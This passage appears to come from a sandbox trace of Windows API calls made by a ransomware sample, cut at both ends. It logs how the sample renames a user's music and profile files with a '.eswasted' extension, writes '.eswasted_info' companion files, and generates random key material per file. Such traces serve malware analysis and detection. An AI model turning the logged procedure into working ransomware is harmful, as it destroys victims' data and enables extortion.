(hFile=0x110) returned 1 [0080.096] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.096] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.096] lstrcpyW (in: lpString1=0x4ef730, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.096] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jbfd.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jbfd.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jbfd.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jbfd.mp3.eswasted")) returned 1 [0080.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jbfd.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jbfd.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0080.097] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0080.100] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0080.101] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0080.101] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.101] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0080.102] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0080.102] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.113] SetEndOfFile (hFile=0x110) returned 1 [0080.115] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.115] CloseHandle (hObject=0x110) returned 1 [0080.117] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef6d0 | out: hHeap=0x4a0000) returned 1 [0080.117] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0080.168] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0080.168] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.168] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lt9dszfOsLJ9T7Frycor.mp3") returned 64 [0080.168] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28a) returned 0x4ef440 [0080.168] lstrcpyW (in: lpString1=0x4ef4c0, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.168] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.168] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0080.169] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.169] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lt9dszfOsLJ9T7Frycor.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lt9dszfoslj9t7frycor.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0080.170] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.171] SetEndOfFile (hFile=0x110) returned 1 [0080.171] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.171] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.171] lstrcpyW (in: lpString1=0x4ef4c0, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.171] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lt9dszfOsLJ9T7Frycor.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lt9dszfoslj9t7frycor.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lt9dszfOsLJ9T7Frycor.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lt9dszfoslj9t7frycor.mp3.eswasted")) returned 1 [0080.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lt9dszfOsLJ9T7Frycor.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lt9dszfoslj9t7frycor.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0080.172] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0080.173] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0080.174] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0080.174] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.174] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0080.175] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0080.175] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.183] SetEndOfFile (hFile=0x110) returned 1 [0080.185] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.185] CloseHandle (hObject=0x110) returned 1 [0080.187] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0080.187] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0080.188] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0080.188] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.188] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\waWpzQ4Gdkrcsoyqq.mp3") returned 61 [0080.188] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x284) returned 0x4ef440 [0080.188] lstrcpyW (in: lpString1=0x4ef4ba, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.188] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.188] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0080.189] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.189] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.189] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\waWpzQ4Gdkrcsoyqq.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wawpzq4gdkrcsoyqq.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0080.189] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.190] SetEndOfFile (hFile=0x110) returned 1 [0080.191] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.191] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.191] lstrcpyW (in: lpString1=0x4ef4ba, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.191] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\waWpzQ4Gdkrcsoyqq.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wawpzq4gdkrcsoyqq.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\waWpzQ4Gdkrcsoyqq.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wawpzq4gdkrcsoyqq.mp3.eswasted")) returned 1 [0080.191] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\waWpzQ4Gdkrcsoyqq.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wawpzq4gdkrcsoyqq.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0080.191] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0080.193] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0080.194] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0080.194] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.194] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0080.195] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0080.195] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.204] SetEndOfFile (hFile=0x110) returned 1 [0080.206] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.206] CloseHandle (hObject=0x110) returned 1 [0080.208] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0080.208] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0080.209] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0080.209] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.209] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wLwa_06G0.wav") returned 53 [0080.209] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x274) returned 0x4ef440 [0080.209] lstrcpyW (in: lpString1=0x4ef4aa, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.209] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.209] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0080.210] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.210] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wLwa_06G0.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wlwa_06g0.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0080.211] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.220] SetEndOfFile (hFile=0x110) returned 1 [0080.259] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.259] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.259] lstrcpyW (in: lpString1=0x4ef4aa, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.259] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wLwa_06G0.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wlwa_06g0.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wLwa_06G0.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wlwa_06g0.wav.eswasted")) returned 1 [0080.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wLwa_06G0.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wlwa_06g0.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0080.260] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0080.261] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0080.262] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0080.262] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.262] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0080.263] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0080.263] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.273] SetEndOfFile (hFile=0x110) returned 1 [0080.276] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.276] CloseHandle (hObject=0x110) returned 1 [0080.278] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0080.278] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0080.279] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0080.279] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.279] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\YWxj3ejKZ_X.wav") returned 55 [0080.279] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x278) returned 0x4ef440 [0080.279] lstrcpyW (in: lpString1=0x4ef4ae, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.279] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.279] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0080.280] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.280] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.280] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\YWxj3ejKZ_X.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ywxj3ejkz_x.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0080.281] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.282] SetEndOfFile (hFile=0x110) returned 1 [0080.283] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.283] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.283] lstrcpyW (in: lpString1=0x4ef4ae, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.283] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\YWxj3ejKZ_X.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ywxj3ejkz_x.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\YWxj3ejKZ_X.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ywxj3ejkz_x.wav.eswasted")) returned 1 [0080.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\YWxj3ejKZ_X.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ywxj3ejkz_x.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0080.284] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0080.287] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0080.288] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0080.288] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.288] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0080.289] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0080.336] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.344] SetEndOfFile (hFile=0x110) returned 1 [0080.346] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0080.346] CloseHandle (hObject=0x110) returned 1 [0080.348] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0080.348] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0080.349] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0080.349] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.349] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 126 [0080.349] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x306) returned 0x4ddfd8 [0080.349] lstrcpyW (in: lpString1=0x4de0d4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.349] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0080.349] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0080.350] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0080.350] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0080.350] WriteFile (in: hFile=0x110, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.351] SetEndOfFile (hFile=0x110) returned 1 [0080.352] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.352] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0080.352] lstrcpyW (in: lpString1=0x4de0d4, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.352] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.eswasted")) returned 0 [0080.352] GetLastError () returned 0x20 [0080.352] CloseHandle (hObject=0x110) returned 1 [0080.354] lstrcpyW (in: lpString1=0x4de0d4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.354] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.eswasted_info")) returned 1 [0080.355] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0080.355] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0080.355] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0080.356] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.356] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 126 [0080.356] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x306) returned 0x4ddfd8 [0080.356] lstrcpyW (in: lpString1=0x4de0d4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.356] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0080.356] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0080.357] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0080.357] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.357] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 